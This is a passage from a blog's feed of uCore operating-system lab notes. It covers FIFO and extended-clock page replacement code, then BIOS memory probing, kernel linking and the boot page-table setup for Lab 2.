<span class="type">int</span></span><br><span class="line">_fifo_map_swappable(<span class="keyword">struct</span> mm_struct *mm, <span class="type">uintptr_t</span> addr, <span class="keyword">struct</span> Page   *page, <span class="type">int</span> swap_in)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">list_entry_t</span> *head=(<span 
class="type">list_entry_t</span>*) mm-&gt;sm_priv;</span><br><span class="line">    <span class="type">list_entry_t</span> *entry=&amp;(page-&gt;pra_page_link);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(entry != <span class="literal">NULL</span> &amp;&amp; head != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">//record the page access situation</span></span><br><span class="line">    <span class="comment">/*LAB3 EXERCISE 2: YOUR CODE*/</span></span><br><span class="line">    <span class="comment">//(1)link the most recent arrival page right after pra_list_head, i.e. at the front of the queue.</span></span><br><span class="line">    <span class="built_in">list_add</span>(head, entry);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="type">int</span></span><br><span class="line">_fifo_swap_out_victim(<span class="keyword">struct</span> mm_struct *mm, <span class="keyword">struct</span> Page ** ptr_page, <span class="type">int</span> in_tick)</span><br><span class="line">&#123;</span><br><span class="line">     <span class="type">list_entry_t</span> *head=(<span class="type">list_entry_t</span>*) mm-&gt;sm_priv;</span><br><span class="line">     <span class="built_in">assert</span>(head != <span class="literal">NULL</span>);</span><br><span class="line">     <span class="built_in">assert</span>(in_tick==<span class="number">0</span>);</span><br><span class="line">     <span class="comment">/* Select the victim */</span></span><br><span class="line">     <span class="comment">/*LAB3 EXERCISE 2: YOUR CODE*/</span></span><br><span class="line">     <span class="comment">//(1)  unlink the earliest arrival page, i.e. the one at the tail (head-&gt;prev) of the pra_list_head queue</span></span><br><span class="line">     <span 
class="comment">//(2)  assign the value of *ptr_page to the addr of this page</span></span><br><span class="line">     <span class="type">list_entry_t</span> *le = head-&gt;prev;</span><br><span class="line">     <span class="built_in">assert</span>(head!=le);</span><br><span class="line">     <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, pra_page_link);</span><br><span class="line">     <span class="built_in">list_del</span>(le);</span><br><span class="line">     <span class="built_in">assert</span>(p !=<span class="literal">NULL</span>);</span><br><span class="line">     *ptr_page = p;</span><br><span class="line"></span><br><span class="line">     <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>If you were to implement the &quot;extended clock page replacement algorithm&quot; in ucore, is the existing swap_manager framework sufficient to support it? If so, give your design. If not, give your extension and the design based on it. The following questions also need to be answered:</p><ul><li>The existing swap_manager framework can support this algorithm in ucore; see <strong>Challenge 1</strong> for details.</li><li>What characterizes a page that should be swapped out?<ul><li>Both the <code>PTE_A</code> (Accessed) and <code>PTE_D</code> (Dirty) bits are 0.</li></ul></li><li>How does ucore identify a page with these characteristics?<ul><li>Fetch the page table entry for the linear address, then test <code>PTE_A</code> and <code>PTE_D</code> with bitwise operations.</li></ul></li><li>When are swap-in and swap-out performed?<ul><li>Swap in on a page fault.</li><li>Swap out when the physical page frames are exhausted, taking care with the dirty bit. The page can be written to the swap area when the dirty bit is modified, or only when the physical page is finally evicted. The latter lets multiple writes be merged and lowers the page-fault cost, but the replacement algorithm then degenerates into the plain clock algorithm rather than the extended clock algorithm.</li></ul></li></ul></li></ul><h3 id="4-扩展练习">4. 
Challenges</h3><h4 id="Challenge-1">Challenge 1</h4><blockquote><p><strong>Implement an extended clock page replacement algorithm that recognizes the dirty bit</strong></p></blockquote><ul><li><p>Building on <code>FIFO</code>, only the <code>swap_out_victim</code> function needs to be implemented.</p></li><li><p>The function looks for a physical page that can be swapped out, and needs at most three passes over the list:</p><ul><li>First pass: look for !PTE_A &amp; !PTE_D, clearing PTE_A on every page visited so that the second pass has something to match.</li><li>Second pass: look for !PTE_A &amp; !PTE_D, clearing PTE_D on every page visited so that the third pass has something to match.</li><li>Third pass: a victim is guaranteed to be found.</li></ul></li><li><p>Take care with <code>PTE_D</code> here: if neither the first nor the second pass finds a suitable physical page, <code>PTE_D</code> has to be cleared. Also note that the TLB must be invalidated every time the PTE flag bits are modified.</p></li><li><p>The <code>swap_out_victim</code> code is as follows (taking a small shortcut: every pass restarts from the beginning of the list, and the remaining functions are reused from <code>FIFO</code>):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="type">int</span></span><br><span class="line">_extend_clock_swap_out_victim(<span class="keyword">struct</span> mm_struct *mm, <span class="keyword">struct</span> Page ** ptr_page, <span class="type">int</span> in_tick)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">list_entry_t</span> *head=(<span class="type">list_entry_t</span>*) mm-&gt;sm_priv;</span><br><span class="line">        <span class="built_in">assert</span>(head != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(in_tick==<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 第一次查找 !PTE_A &amp; !PTE_D，同时重置当前页的PTE_A</span></span><br><span class="line">    <span class="comment">// 第二次查找 !PTE_A &amp; !PTE_D， 同时重置当前页的PTE_D</span></span><br><span class="line">    <span class="comment">// 第三次查找，肯定能找到</span></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; <span class="number">3</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">list_entry_t</span> *le = head-&gt;prev;</span><br><span class="line">        <span class="built_in">assert</span>(head!=le);</span><br><span class="line">        <span class="keyword">while</span>(le != head)</span><br><span class="line">        &#123;</span><br><span 
class="line">            <span class="keyword">struct</span> <span class="title class_">Page</span> *p = <span class="built_in">le2page</span>(le, pra_page_link);</span><br><span class="line">            <span class="type">pte_t</span>* ptep = <span class="built_in">get_pte</span>(mm-&gt;pgdir, p-&gt;pra_vaddr, <span class="number">0</span>);</span><br><span class="line">            <span class="comment">// If the page is neither accessed nor dirty, pick it as the victim right away</span></span><br><span class="line">            <span class="keyword">if</span>(!(*ptep &amp; PTE_A) &amp;&amp; !(*ptep &amp; PTE_D))</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">list_del</span>(le);</span><br><span class="line">                <span class="built_in">assert</span>(p !=<span class="literal">NULL</span>);</span><br><span class="line">                *ptr_page = p;</span><br><span class="line">                <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// First pass: a PTE that has been accessed is marked as not accessed.</span></span><br><span class="line">            <span class="keyword">if</span>(i == <span class="number">0</span>)</span><br><span class="line">                *ptep &amp;= ~PTE_A;</span><br><span class="line">            <span class="comment">// Second pass: a PTE that has been modified is marked as not dirty.</span></span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(i == <span class="number">1</span>)</span><br><span class="line">                *ptep &amp;= ~PTE_D;</span><br><span class="line"></span><br><span class="line">            le = le-&gt;prev;</span><br><span class="line">            <span class="comment">// The flag bits of this page's PTE may have changed, so invalidate the TLB entry for its virtual address</span></span><br><span class="line">            <span class="built_in">tlb_invalidate</span>(mm-&gt;pgdir, p-&gt;pra_vaddr);</span><br><span class="line">        &#125;</span><br><span 
class="line">    &#125;</span><br><span class="line">    <span class="comment">// 按照前面的assert与if，不可能会执行到此处，所以return -1</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">swap_manager</span> swap_manager_fifo =</span><br><span class="line">&#123;</span><br><span class="line">     .name            = <span class="string">&quot;extend_clock swap manager&quot;</span>,</span><br><span class="line">     .init            = &amp;_fifo_init,</span><br><span class="line">     .init_mm         = &amp;_fifo_init_mm,</span><br><span class="line">     .tick_event      = &amp;_fifo_tick_event,</span><br><span class="line">     .map_swappable   = &amp;_fifo_map_swappable,</span><br><span class="line">     .set_unswappable = &amp;_fifo_set_unswappable,</span><br><span class="line">     .swap_out_victim = &amp;_extend_clock_swap_out_victim,</span><br><span class="line">     .check_swap      = &amp;_fifo_check_swap,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li></ul><h4 id="Challenge-2">Challenge 2</h4><blockquote><p><strong>实现不考虑实现开销和效率的LRU页替换算法</strong></p></blockquote><p>遇到了一个较为麻烦的问题：如何在正常访问内存时设置<code>swap_manager</code>中相关链表上物理页的LRU，留坑…</p>]]></content>
    
    
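    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are the notes the author took while completing &lt;code&gt;uCore&lt;/code&gt; Lab 3.&lt;/li&gt;
&lt;li&gt;Topics include virtual memory management, among other things.&lt;/li&gt;
&lt;li&gt;The post is long; using the navigation bar on the right is recommended.&lt;/li&gt;
&lt;/ul&gt;</summary>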
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab2</title>
    <link href="https://kiprey.github.io/2020/08/uCore-2/"/>
    <id>https://kiprey.github.io/2020/08/uCore-2/</id>
    <published>2020-08-09T14:25:53.000Z</published>
    <updated>2025-11-24T03:59:40.149Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are the notes the author took while completing <code>uCore</code> Lab 2.</li><li>Topics include segmented-paged memory management, the paging mechanism, and the structure of uCore's page directory and page tables.</li><li>The post is long; using the navigation bar on the right is recommended.</li></ul><span id="more"></span><h2 id="1-知识点">1. Key concepts</h2><h3 id="1-物理内存探测">1) Physical memory probing</h3><ul><li><p>The operating system needs to know how physical memory is laid out across the whole machine: which regions are usable and which are not. This is done with the help of BIOS interrupt calls. <code>bootasm.S</code> gains a new piece of code that uses a BIOS interrupt to probe the physical memory map.</p></li><li><p>Before walking through that code, here is a structure it relies on:</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">e820map</span> &#123;      <span class="comment">// this structure is stored at physical address 0x8000</span></span><br><span class="line">    <span class="type">int</span> nr_map;       <span class="comment">// number of entries in map</span></span><br><span class="line">    <span class="keyword">struct</span> &#123;</span><br><span class="line">        <span class="type">uint64_t</span> addr;    <span class="comment">// start address of a memory region</span></span><br><span class="line">        <span class="type">uint64_t</span> size;    <span class="comment">// size of a memory region</span></span><br><span class="line">        <span class="type">uint32_t</span> type;    <span class="comment">// type of a memory region: 1 marks usable memory; 2 marks reserved memory that must not be mapped.</span></span><br><span class="line">    &#125; __attribute__((packed)) map[E820MAX];</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>The code added to bootasm.S is shown below; the details are given as comments in the code.</p>  <figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">probe_memory:</span></span><br><span class="line">    movl <span class="number">$0</span>, <span class="number">0x8000</span>   # 初始化，向内存地址<span class="number">0x8000</span>，即uCore结构e820map中的成员nr_map中写入<span class="number">0</span></span><br><span class="line">    xorl %ebx, %ebx   # 初始化%ebx为<span class="number">0</span>，这是<span class="keyword">int</span> <span class="number">0x15</span>的其中一个参数</span><br><span class="line">    movw <span class="number">$0</span>x8004, %di # 初始化%di寄存器，使其指向结构e820map中的成员数组map</span><br><span class="line"><span class="symbol">start_probe:</span></span><br><span class="line">    movl <span class="number">$0</span>xE820, %eax  # BIOS <span class="number">0x15</span>中断的子功能编号 %eax == <span class="number">0xE820</span></span><br><span class="line">    movl <span class="number">$20</span>, %ecx    # 存放地址范围描述符的内存大小，至少<span class="number">20</span></span><br><span class="line">    movl $SMAP, %edx  # 签名， %edx == 0x534D4150h(<span class="string">&quot;SMAP&quot;</span>字符串的ASCII码)</span><br><span class="line">    <span class="keyword">int</span> <span class="number">$0</span>x15     # 调用<span class="number">0x15</span>中断</span><br><span class="line">    <span class="keyword">jnc</span> cont      # 如果该中断执行失败，则CF标志位会置<span class="number">1</span>，此时要通知UCore出错</span><br><span class="line">    movw <span class="number">$12345</span>, <span class="number">0x8000</span> # 向结构e820map中的成员nr_map中写入特殊信息，报告当前错误</span><br><span class="line">    <span class="keyword">jmp</span> finish_probe    # 
jump to the end and stop probing memory</span><br><span class="line"><span class="symbol">cont:</span></span><br><span class="line">    addw <span class="number">$20</span>, %di   # if the interrupt succeeded, advance the destination address by one entry</span><br><span class="line">    incl <span class="number">0x8000</span>     # e820::nr_map++</span><br><span class="line">    cmpl <span class="number">$0</span>, %ebx   # the BIOS returns a continuation value in %ebx; if %ebx is <span class="number">0</span>, memory probing is complete</span><br><span class="line">    <span class="keyword">jnz</span> start_probe</span><br><span class="line"><span class="symbol">finish_probe:</span></span><br></pre></td></tr></table></figure></li><li><p>Once this code has run, the memory layout obtained from the BIOS is stored as an <code>e820map</code> structure at physical address <code>0x8000</code>. Later, ucore's page_init function reads that address and processes all of the memory information.</p></li></ul><h3 id="2-链接地址">2) Link address</h3><ul><li><p>Reading the linker script <code>lab2/tools/kernel.ld</code>, it is easy to see that the linker sets the kernel's link address to <code>0xC0100000</code>, which is a virtual address. The uCore bootloader loads the kernel with the following statement:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">readseg</span>(ph-&gt;p_va &amp; <span class="number">0xFFFFFF</span>, ph-&gt;p_memsz, ph-&gt;p_offset);</span><br></pre></td></tr></table></figure><p><code>(0xC0100000 &amp; 0xFFFFFF) == 0x00100000</code>, so the kernel ends up loaded at physical address <code>0x100000</code>. The offset between the two is <code>-0xc0000000</code>, which matches the virtual address offset configured in uCore.</p></li><li><p>Note that some lab2 code uses the following two variables, yet neither of them is defined in any C source file:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">extern</span> <span class="type">char</span> end[];</span><br><span class="line"><span class="keyword">extern</span> <span class="type">char</span> edata[];</span><br></pre></td></tr></table></figure><p>They are in fact defined in the linker script <code>kernel.ld</code>:</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">. = <span class="built_in">ALIGN</span>(<span class="number">0x1000</span>);</span><br><span class="line">.data.pgdir : &#123;</span><br><span class="line">    *(.data.pgdir)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">PROVIDE</span>(edata = .);</span><br><span class="line"></span><br><span class="line">.bss : &#123;</span><br><span class="line">    *(.bss)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">PROVIDE</span>(end = .);</span><br><span class="line"></span><br><span class="line">/DISCARD/ : &#123;</span><br><span class="line">    *(.eh_frame .note.GNU-stack)</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 脚本文件的结尾</span></span><br></pre></td></tr></table></figure><p><code>edata</code>表示<code>kernel</code>的<code>data</code>段结束地址；<code>end</code>表示<code>bss</code>段的结束地址（即整个<code>kernel</code>的结束地址）</p><p><code>edata[]</code>和 <code>end[]</code>这些变量是ld根据kernel.ld链接脚本生成的全局变量，表示相应段的结束地址，它们不在任何一个.S、.c或.h文件中定义，但仍然可以在源码文件中使用。</p></li></ul><h3 id="3-uCore的内存空间布局">3) 
uCore memory layout</h3><ul><li><p>In uCore, the CPU first calls the BIOS interrupt in bootasm.S (real mode) to write the physical memory descriptors to the fixed location <code>0x8000</code>, and then loads the kernel at physical address <code>0x100000</code>, which corresponds to virtual address <code>0xC0100000</code>.</p></li><li><p>In <code>page_init</code>, the kernel then reads the memory at physical address <code>0x8000</code>, finds the highest physical address, and computes the number of <strong>pages</strong> required. The virtual page table <code>VPT(Virtual Page Table)</code> is placed right after the <code>kernel</code>, aligned to 4 KB. The virtual address space is laid out as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* *</span></span><br><span class="line"><span class="comment"> * Virtual memory map:                                          Permissions</span></span><br><span class="line"><span class="comment"> *                                                              kernel/user</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *     4G -----------&gt; +---------------------------------+</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |       
  Empty Memory (*)        |</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     +---------------------------------+ 0xFB000000</span></span><br><span class="line"><span class="comment"> *                     |   Cur. Page Table (Kern, RW)    | RW/-- PTSIZE</span></span><br><span class="line"><span class="comment"> *     VPT ----------&gt; +---------------------------------+ 0xFAC00000</span></span><br><span class="line"><span class="comment"> *                     |        Invalid Memory (*)       | --/--</span></span><br><span class="line"><span class="comment"> *     KERNTOP ------&gt; +---------------------------------+ 0xF8000000</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |    Remapped Physical Memory     | RW/-- KMEMSIZE</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *     KERNBASE -----&gt; +---------------------------------+ 0xC0000000</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     |                                 |</span></span><br><span class="line"><span class="comment"> *                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span></span><br><span class="line"><span class="comment"> * (*) Note: The kernel ensures that &quot;Invalid Memory&quot; is *never* mapped.</span></span><br><span class="line"><span class="comment"> *     &quot;Empty Memory&quot; is normally 
unmapped, but user programs may map pages</span></span><br><span class="line"><span class="comment"> *     there if desired.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * */</span></span><br></pre></td></tr></table></figure><p>完成<strong>物理内存页管理初始化工作</strong>后，其物理地址的分布空间如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">+----------------------+ &lt;- <span class="number">0xFFFFFFFF</span>(<span class="number">4</span>GB)       ----------------------------  <span class="number">4</span>GB</span><br><span class="line">|  一些保留内存，例如用于|                                保留空间</span><br><span class="line">|   <span class="number">32</span>bit设备映射空间等  |</span><br><span class="line">+----------------------+ 
&lt;- 实际物理内存空间结束地址 ----------------------------</span><br><span class="line">|                      |</span><br><span class="line">|                      |</span><br><span class="line">|     用于分配的         |                                 可用的空间</span><br><span class="line">|    空闲内存区域        |</span><br><span class="line">|                      |</span><br><span class="line">|                      |</span><br><span class="line">|                      |</span><br><span class="line">+----------------------+ &lt;- 空闲内存起始地址      ----------------------------  </span><br><span class="line">|     VPT页表存放位置      |                                VPT页表存放的空间   (<span class="number">4</span>MB左右)</span><br><span class="line">+----------------------+ &lt;- bss段结束处           ----------------------------</span><br><span class="line">|uCore的text、data、bss |                              uCore各段的空间</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x00100000</span>(<span class="number">1</span>MB)       ---------------------------- <span class="number">1</span>MB</span><br><span class="line">|       BIOS ROM       |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x000F0000</span>(<span class="number">960</span>KB)</span><br><span class="line">|     <span class="number">16</span>bit设备扩展ROM  |                             显存与其他ROM映射的空间</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x000C0000</span>(<span class="number">768</span>KB)</span><br><span class="line">|     CGA显存空间       |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x000B8000</span>            ---------------------------- <span class="number">736</span>KB</span><br><span class="line">|        空闲内存       |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x00011000</span>(<span class="number">+4</span>KB)          uCore header的内存空间</span><br><span 
class="line">| uCore的ELF header数据 |</span><br><span class="line">+----------------------+ &lt;<span class="number">-0x00010000</span>             ---------------------------- <span class="number">64</span>KB</span><br><span class="line">|       空闲内存        |</span><br><span class="line">+----------------------+ &lt;- 基于bootloader的大小          bootloader的</span><br><span class="line">|      bootloader的   |                                    内存空间</span><br><span class="line">|     text段和data段    |</span><br><span class="line">+----------------------+ &lt;- <span class="number">0x00007C00</span>            ---------------------------- <span class="number">31</span>KB</span><br><span class="line">|   bootloader和uCore  |</span><br><span class="line">|      共用的堆栈       |                                 堆栈的内存空间</span><br><span class="line">+----------------------+ &lt;- 基于栈的使用情况</span><br><span class="line">|     低地址空闲空间    |</span><br><span class="line">+----------------------+ &lt;-  <span class="number">0x00000000</span>           ---------------------------- <span class="number">0</span>KB</span><br></pre></td></tr></table></figure><p>易知，其页表地址之上的物理内存空间是空闲的（除去保留的内存），故将该物理地址之下的物理空间对应的页表全部设置为保留(reserved)。并将这些空闲的内存全部添加进页表项中。</p></li></ul><h3 id="4-段页式存储管理（重要）">4. 段页式存储管理（重要）</h3><blockquote><p>在保护模式中，x86 体系结构将内存地址分成三种：<strong>逻辑地址</strong>（也称<strong>虚拟地址</strong>）、<strong>线性地址</strong>和<strong>物理地址</strong>。</p></blockquote><ul><li>段式存储在内存保护方面有优势，页式存储在内存利用和优化转移到后备存储方面有优势。</li><li>在段式存储管理基础上，给每个段加一级页表。同时，通过指向相同的页表基址，实现进程间的段共享。</li><li>在段页式管理中，操作系统弱化了段式管理中的功能，实现以分页为主的内存管理。段式管理只起到了一个过滤的作用，它将地址不加转换直接映射成线性地址。将虚拟地址转换为物理地址的过程如下：<ul><li>根据段寄存器中的段选择子，获取GDT中的特定基址并加上目标偏移来确定<strong>线性地址</strong>。由于GDT中所有的基址全为0（因为弱化了段式管理的功能，对等映射），所以此时的逻辑地址和线性地址是相同的。</li><li>根据该线性地址，获取对应页表项，并根据该页表项来获取对应的物理地址。</li></ul></li><li><strong>一级页表（页目录表PageDirectoryTable, PDT）的起始地址存储于<code>%cr3</code>寄存器中。</strong></li></ul><h4 id="a-启动页机制（重要）">a. 
启动页机制（重要）</h4><p>启动页机制的代码很简单，其对应的汇编代码为</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"># labcodes/lab2/kern/init/entry<span class="number">.</span>S</span><br><span class="line"><span class="symbol">kern_entry:</span></span><br><span class="line">    # load pa of boot pgdir</span><br><span class="line">    movl $REALLOC(__boot_pgdir), %eax</span><br><span class="line">    movl %eax, %cr3</span><br><span class="line">    # enable paging</span><br><span class="line">    movl %cr0, %eax</span><br><span class="line">    orl $(CR0_PE | CR0_PG | CR0_AM | CR0_WP | CR0_NE | CR0_TS | CR0_EM | CR0_MP), %eax</span><br><span class="line">    andl $~(CR0_TS | CR0_EM), %eax</span><br><span 
class="line">    movl %eax, %cr0</span><br><span class="line"></span><br><span class="line">    # update <span class="built_in">eip</span></span><br><span class="line">    # now, <span class="built_in">eip</span> = 0x1xxxxx</span><br><span class="line">    leal next, %eax</span><br><span class="line">    # set <span class="built_in">eip</span> = KERNBASE + 0x1xxxxx</span><br><span class="line">    <span class="keyword">jmp</span> *%eax</span><br><span class="line"><span class="symbol">next:</span></span><br><span class="line">  # .....省略剩余代码</span><br><span class="line"></span><br><span class="line"># kernel builtin pgdir</span><br><span class="line"># an initial page directory (Page Directory Table, PDT)</span><br><span class="line"># These page directory table <span class="keyword">and</span> page table can be reused!</span><br><span class="line"><span class="meta">.section</span> .data<span class="number">.</span>pgdir</span><br><span class="line"><span class="meta">.align</span> PGSIZE</span><br><span class="line"><span class="symbol">__boot_pgdir:</span></span><br><span class="line"><span class="meta">.globl</span> __boot_pgdir</span><br><span class="line">    # map va <span class="number">0</span> ~ 4M to pa <span class="number">0</span> ~ 4M (temporary)</span><br><span class="line"><span class="meta">    .long</span> REALLOC(__boot_pt1) + (PTE_P | PTE_U | PTE_W)</span><br><span class="line"><span class="meta">    .space</span> (KERNBASE &gt;&gt; PGSHIFT &gt;&gt; <span class="number">10</span> &lt;&lt; <span class="number">2</span>) - (. - __boot_pgdir) # pad to PDE of KERNBASE</span><br><span class="line">    # map va KERNBASE + (<span class="number">0</span> ~ 4M) to pa <span class="number">0</span> ~ 4M</span><br><span class="line"><span class="meta">    .long</span> REALLOC(__boot_pt1) + (PTE_P | PTE_U | PTE_W)</span><br><span class="line"><span class="meta">    .space</span> PGSIZE - (. 
